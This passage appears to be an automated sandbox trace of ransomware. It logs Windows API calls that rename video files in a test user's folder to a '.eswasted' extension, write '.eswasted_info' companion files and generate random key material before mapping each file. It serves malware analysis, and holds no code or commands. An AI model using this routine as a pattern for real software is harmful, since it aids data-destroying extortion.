Xg_G\\1kMbg\\c8fjIb0QJshu\\OZO5d7F9WWfZWgkgRi8h.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\ozo5d7f9wwfzwgkgri8h.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.088] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0081.091] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0081.092] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.092] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.092] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0081.093] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0081.093] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.151] SetEndOfFile (hFile=0x108) returned 1 [0081.153] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0081.153] CloseHandle (hObject=0x108) returned 1 [0081.155] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0081.155] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0081.158] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0081.158] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.158] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\qw2j6PLqnK\\SlYmb-S.mkv") returned 101 [0081.158] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2d4) returned 0x1312110 [0081.158] lstrcpyW (in: lpString1=0x13121da, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.158] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0081.158] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0081.159] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0081.159] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\qw2j6PLqnK\\SlYmb-S.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\qw2j6plqnk\\slymb-s.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0081.198] WriteFile (in: hFile=0x108, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.199] SetEndOfFile (hFile=0x108) returned 1 [0081.199] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.200] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0081.200] lstrcpyW (in: lpString1=0x13121da, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.200] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\qw2j6PLqnK\\SlYmb-S.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\qw2j6plqnk\\slymb-s.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\qw2j6PLqnK\\SlYmb-S.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\qw2j6plqnk\\slymb-s.mkv.eswasted")) returned 1 [0081.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\qw2j6PLqnK\\SlYmb-S.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\qw2j6plqnk\\slymb-s.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.201] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0081.202] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0081.202] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.202] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.203] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0081.203] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0081.203] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.212] SetEndOfFile (hFile=0x108) returned 1 [0081.214] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0081.214] CloseHandle (hObject=0x108) returned 1 [0081.215] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0081.215] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0081.216] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0081.216] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.216] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\7DlDbAQsToVfE 4-hBa4.avi") returned 97 [0081.216] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2cc) returned 0x1312110 [0081.216] lstrcpyW (in: lpString1=0x13121d2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.216] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0081.216] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0081.217] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0081.217] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\7DlDbAQsToVfE 4-hBa4.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\7dldbaqstovfe 4-hba4.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0081.218] WriteFile (in: hFile=0x108, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.219] SetEndOfFile (hFile=0x108) returned 1 [0081.219] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.219] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0081.219] lstrcpyW (in: lpString1=0x13121d2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.219] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\7DlDbAQsToVfE 4-hBa4.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\7dldbaqstovfe 4-hba4.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\7DlDbAQsToVfE 4-hBa4.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\7dldbaqstovfe 4-hba4.avi.eswasted")) returned 1 [0081.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\7DlDbAQsToVfE 4-hBa4.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\7dldbaqstovfe 4-hba4.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0081.220] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0081.221] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0081.222] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.222] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.222] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0081.223] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0081.223] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.231] SetEndOfFile (hFile=0x108) returned 1 [0081.265] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0081.265] CloseHandle (hObject=0x108) returned 1 [0081.266] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0081.266] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0081.267] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0081.267] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.267] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\WbWsLJMUqxS9.mp4") returned 78 [0081.267] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a6) returned 0x6f5cc0 [0081.267] lstrcpyW (in: lpString1=0x6f5d5c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.267] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.267] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0081.268] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.268] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\WbWsLJMUqxS9.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\wbwsljmuqxs9.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0081.268] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.269] SetEndOfFile (hFile=0x108) returned 1 [0081.270] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.270] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.270] lstrcpyW (in: lpString1=0x6f5d5c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.270] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\WbWsLJMUqxS9.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\wbwsljmuqxs9.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\WbWsLJMUqxS9.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\wbwsljmuqxs9.mp4.eswasted")) returned 1 [0081.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\WbWsLJMUqxS9.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\wbwsljmuqxs9.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0081.271] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0081.273] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0081.274] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0081.274] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.274] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0081.275] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0081.275] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.283] SetEndOfFile (hFile=0x108) returned 1 [0081.285] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.285] CloseHandle (hObject=0x108) returned 1 [0081.287] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0081.287] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0081.288] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0081.288] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.288] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\z33T3.mkv") returned 71 [0081.288] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x298) returned 0x6f5cc0 [0081.288] lstrcpyW (in: lpString1=0x6f5d4e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.288] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.288] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0081.289] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.289] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\z33T3.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\z33t3.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0081.290] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.291] SetEndOfFile (hFile=0x108) returned 1 [0081.291] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.292] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.292] lstrcpyW (in: lpString1=0x6f5d4e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.292] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\z33T3.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\z33t3.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\z33T3.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\z33t3.mkv.eswasted")) returned 1 [0081.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\z33T3.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\z33t3.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.293] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0081.294] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0081.295] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0081.295] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.295] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0081.343] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0081.343] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.353] SetEndOfFile (hFile=0x108) returned 1 [0081.356] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.356] CloseHandle (hObject=0x108) returned 1 [0081.369] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0081.369] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0081.370] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0081.371] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.371] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\onNt0X\\-uujbnc.mp4") returned 59 [0081.371] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x280) returned 0x6f5cc0 [0081.371] lstrcpyW (in: lpString1=0x6f5d36, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.371] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.371] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0081.372] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.372] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.372] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\onNt0X\\-uujbnc.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\onnt0x\\-uujbnc.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0081.639] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.640] SetEndOfFile (hFile=0x108) returned 1 [0081.641] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.641] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.641] lstrcpyW (in: lpString1=0x6f5d36, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.641] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\onNt0X\\-uujbnc.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\onnt0x\\-uujbnc.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\onNt0X\\-uujbnc.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\onnt0x\\-uujbnc.mp4.eswasted")) returned 1 [0081.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\onNt0X\\-uujbnc.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\onnt0x\\-uujbnc.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0081.641] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0081.643] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0081.644] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.644] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.644] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0081.645] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0081.645] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.654] SetEndOfFile (hFile=0x108) returned 1 [0081.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.656] CloseHandle (hObject=0x108) returned 1 [0081.658] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0081.658] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0081.659] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0081.659] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.659] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Q4qjzsKde1yg4RDN.swf") returned 61 [0081.659] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x284) returned 0x6f5cc0 [0081.659] lstrcpyW (in: lpString1=0x6f5d3a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.659] RtlAllocateHeap 